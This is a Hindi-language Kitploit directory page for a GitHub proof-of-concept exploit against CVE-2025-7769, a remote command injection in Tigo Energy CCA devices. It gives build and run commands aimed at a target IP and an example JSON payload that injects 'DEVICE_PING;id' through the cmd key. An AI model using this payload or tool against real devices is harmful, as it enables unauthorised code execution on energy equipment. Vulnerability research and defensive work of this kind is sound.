Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-7769 — DEVICE_PING एंडपॉइंट के माध्यम से एक कमांड इंजेक्ट करने के लिए PoC | Kitploit
उपकरण/GitHubGitHub/bytereaper77/cve-2025-7769
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंगArchived
GitHubbytereaper77/cve-2025-7769

CVE-2025-7769

DEVICE_PING एंडपॉइंट के माध्यम से एक कमांड इंजेक्ट करने के लिए PoC

रिपॉजिटरी देखें
111 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-7769 – mobile_api में दूरस्थ कमांड इंजेक्शन

विवरण :

यह रिपॉजिटरी CVE‑2025‑7769 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) एक्सप्लॉइट है, जो Tigo Energy CCA उपकरणों में पाई गई एक गंभीर दूरस्थ कमांड इंजेक्शन भेद्यता है, जो /cgi-bin/mobile_api एंडपॉइंट को उजागर करते हैं।

यह भेद्यता cmd JSON कुंजी के माध्यम से OS कमांड्स इंजेक्ट करके ट्रिगर होती है, जहाँ अनफ़िल्टर्ड इनपुट सीधे एक सिस्टम कॉल में जोड़ दिया जाता है, जो डिवाइस पर पूर्ण दूरस्थ कोड निष्पादन (RCE) की अनुमति देता है।

संदर्भ :

  • NVD प्रविष्टि: https://nvd.nist.gov/vuln/detail/CVE-2025-7769

उपयोग :

root@kitploit:~
gcc exploit.c argparse.c -o CVE-2025-7769 -lcurl
./CVE-2025-7769 -i 10.0.2.15 -p 80 -v
Replace 10.0.2.15 with the target IP.

Use -u http://target.com if you want to pass a full base URL instead of IP/port.

Example Payload :

{
  "cmd": "DEVICE_PING;id",
  "dev": 2,
  "ver": 1
}

लाइसेंस :

MIT License

टूल डाउनलोड करें